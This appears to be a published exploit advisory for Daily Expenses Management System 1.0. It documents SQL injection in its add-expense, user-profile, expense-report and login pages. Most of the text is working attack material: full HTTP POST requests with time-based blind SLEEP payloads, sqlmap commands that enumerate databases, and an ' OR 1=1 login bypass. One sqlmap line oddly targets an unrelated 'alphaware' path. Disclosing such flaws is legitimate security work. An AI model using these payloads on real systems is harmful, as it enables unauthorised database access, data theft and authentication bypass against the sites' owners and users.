Daily Expenses Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities. Original discovery of SQL injection in this version is attributed to Daniel Ortiz.
1e0fcc5209709de3fa6c0c22a21e0f65
# Exploit Title: Daily Expenses Management System 1.0 - Multiple SQL Injection Vulnerabilty
# Date: 2020-8-5
# Exploit Author: Edo Maland
# Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Software Link: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Version: 1.0
# Tested on: XAMPP / Windows 10
-------------------------------------------------------------------------------------------------------------------------------------
# Feature: Add Expenses
# Vulnerable file: add-expense.php
# Vulnerable parameter :
- item
- costitem
# PoC
Url : http://example.com/dets/add-expense.php
Methode : Post
# Burpsuite Requests
POST /dets/add-expense.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
Origin: http://example.com
Connection: close
Referer: http://example.com/dets/add-expense.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1
dateexpense=1337-11-11&item=1%27+AND+%28SELECT+8429+FROM+%28SELECT%28SLEEP%285%29%29%29IWeV%29+AND+%27hmPP%27%3D%27hmPP&costitem=2&submit=
# Payload
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: dateexpense=1337-11-11&item=1' AND (SELECT 8429 FROM (SELECT(SLEEP(5)))IWeV) AND 'hmPP'='hmPP&costitem=2&submit=
# Sqlmap Command
sqlmap -u "http://example.com/alphaware/summary.php?tid=1337*" --dbs --random-agent -v 3
-------------------------------------------------------------------------------------------------------------------------------------
# Feature: Edit Profile
# Vulnerable file: user-profile.php
# Vulnerable parameter :
- fullname
# PoC
Url : http://example.com/dets/user-profile.php
Methode : Post
# Burpsuite Requests
POST /dets/user-profile.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 189
Origin: http://example.com
Connection: close
Referer: http://example.com/dets/user-profile.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1
fullname=%27+AND+%28SELECT+2029+FROM+%28SELECT%28SLEEP%285%29%29%29JJJm%29+AND+%27UMUq%27%3D%27UMUq&email=info%40sql.id&contactnumber=1337173137®date=2020-08-05+13%3A49%3A51&submit=
# Payload
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fullname=admin3' AND (SELECT 2029 FROM (SELECT(SLEEP(5)))JJJm) AND 'UMUq'='UMUq&[email protected]&contactnumber=1337173137®date=2020-08-05 13:49:51&submit=
# Sqlmap Command
sqlmap -u "https://example.com/dets/user-profile.php" --data="fullname=admin3*&email=info%40sql.id&contactnumber=1337173137®date=2020-08-05+13%3A49%3A51&submit=" --random-agent --threads 5 --cookie="PHPSESSID=lu0nb6l63bleu39pbjf5a954p9" -v 3 --dbs
-------------------------------------------------------------------------------------------------------------------------------------
# Feature: Expense Reports
# Vulnerable file:
- expense-monthwise-reports-detailed.php
- expense-datewise-reports.php
- expense-yearwise-reports.php
# Vulnerable parameter :
- fromdate
- todate
# PoC
Url : http://example.com/dets/expense-monthwise-reports-detailed.php
Methode : Post
# Burpsuite Requests
POST /dets/expense-yearwise-reports-detailed.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://example.com
Connection: close
Referer: http://example.com/dets/expense-yearwise-reports.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1
fromdate=2020-08-13'+AND+(SELECT+1473+FROM+(SELECT(SLEEP(5)))rhGI)+AND+'moGo'%3d'moGo&todate=2020-08-20&submit=
# Payload
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=2020-08-13' AND (SELECT 1473 FROM (SELECT(SLEEP(5)))rhGI) AND 'moGo'='moGo&todate=2020-07-29&submit=
# Sqlmap Command
sqlmap -u "https://example.com/dets/expense-monthwise-reports-detailed.php" --data="fromdate=2020-08-13*&todate=2020-07-29&submit=" --random-agent --cookie="PHPSESSID=lu0nb6l63bleu39pbjf5a954p9" --dbs
-------------------------------------------------------------------------------------------------------------------------------------
# Feature: Login Page
# Bypass Login Using SQLi on Admin/Member
# Vulnerable file: index.php
# PoC
URL : https://example.com/dets/index.php
Logging in with following details:
- Payload : "' OR 1=1 -- '"@sql.id
# Burp Requests
POST /dets/index.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Origin: http://example.com
Connection: close
Referer: http://example.com/dets/index.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1
email="' OR 1=1 -- '"@sql.id&password=1337&login=login